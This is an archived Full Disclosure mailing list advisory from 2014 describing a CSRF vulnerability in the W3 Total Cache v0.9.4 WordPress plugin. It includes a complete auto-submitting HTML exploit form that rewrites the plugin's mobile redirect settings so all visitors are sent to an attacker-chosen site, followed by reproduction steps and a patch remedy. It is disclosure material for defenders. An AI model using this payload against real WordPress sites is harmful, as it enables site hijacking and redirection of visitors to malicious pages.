Full Disclosure mailing list archives

By Date By Thread W3TotalFail: W3 Total Cache v 0.9.4 CSRF Vulnerability that Leads to Full Deface From: Mazin Ahmed <mazen150 () hotmail com>

Date: Tue, 16 Dec 2014 11:38:38 -0500

#### # Title: W3TotalFail: W3 Total Cache v 0.9.4 CSRF Vulnerability that Leads to Full Deface # Author: Mazin Ahmed ## # Date of Discovering: October 6th, 2014 # Date of Reporting to the Vendor: October 7th, 2014 # Date of Releasing a Patch: December 9th, 2014 ## # Vulnerability Type: Cross-Site Request Forgery (CSRF) - CWE-352 ## # Vendor Homepage: https://www.w3-edge.com/ ## # Affected Version: 0.9.4, previous versions might be vulnerable as well. # Affected Software Link: https://downloads.wordpress.org/plugin/w3-total-cache.0.9.4.zip # Patch Link: https://downloads.wordpress.org/plugin/w3-total-cache.0.9.4.1.zip # Tested on: Wordpress 4.0 # Blog Post: http://mazinahmed1.blogspot.com/2014/12/w3-total-caches-w3totalfail.html # POC Video: https://www.youtube.com/watch?v=JwRteg7Iqyw #### ###Description: W3 Total Cache v0.9.4 is vulnerable to a critical Cross-Site Request Forgery issue. It occurs because of the invalidation of the CSRF token "_wpnonce". This CSRF issue can be used to perform many actions, but the most significant action that has the biggest impact on users is redirecting users to malicious websites. This can be happened by using the feature of specify particular user-agents to be redirected to mobile site. By crafting an exploit that forces the victim to change the policy feature's policy to redirect every user who visit the victim's website to be redirected to a specific website that is specified by the attacker. This can be done by adding all the common keywords that is used on user-agents. ###Exploit: ------------------------------------------------------------------------------------------------------------------------------ <html> <body onload="javascript:document.csrf_form.submit()"> <form method="post" action="http://localhost/wordpress/wp-admin/admin.php?page=w3tc_mobile" name="csrf_form"> <input type="hidden" name="mobile_groups[exploit_by_mazen160][enabled]" value="0"> <input type="hidden" name="mobile_groups[exploit_by_mazen160][enabled]" value="1"> <input type="hidden" name="mobile_groups[exploit_by_mazen160][theme]" value=""> <input type="hidden" name="mobile_groups[exploit_by_mazen160][redirect]" value="https://twitter.com/mazen160"> <input type="hidden" name="mobile_groups[exploit_by_mazen160][agents]" value="Mozilla Opera iTunes ELinks Links Konqueror Midori Uzbl (Webkit 1.3) w3m Lynx POLARIS nook BlackBerry LG MOT Nokia SEC Sony Baiduspider Google msnbot Email Gaisbot grub Download Wget curl"> <input type="hidden" name="_wp_http_referer=" value="http://localhost/wordpress/wp-admin/admin.php?page=w3tc_mobile"> <input type="hidden" name="w3tc_save_options" value="Save+all+settings"/> <input type="hidden" name="_wpnonce" value=""> <input type="hidden" name="w3tc_note" value="config_save"> </form> </body> </html> ------------------------------------------------------------------------------------------------------------------------------ ###Vulnearble Versions: The issue has been confirmed on W3 Total Cache (v0.9.4). Previous versions might be vulnerable as well. ###Severity: Critical ###Steps to Reproduce: 1- An attacker uploads the exploit to an accessible server 2- The attacker sends a link of the exploit to the victim (who is using W3 Total Cache) 3- The victim clicks on the link (while he is authenticated), and the exploit run on the victim's client-side 4- The victim's website settings will be changed, and anyone who visits the victim's website will be redirected to the attacker's malicious website. ###Remedy: Update W3 Total Cache plugin to the latest version. Best Regards, Mazin Ahmed https://twitter.com/mazen160 http://mazinahmed1.blogspot.com https://linkedin.com/pub/mazin-ahmed/86/795/629 _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ By Date By Thread Current thread: W3TotalFail: W3 Total Cache v 0.9.4 CSRF Vulnerability that Leads to Full Deface Mazin Ahmed (Dec 16)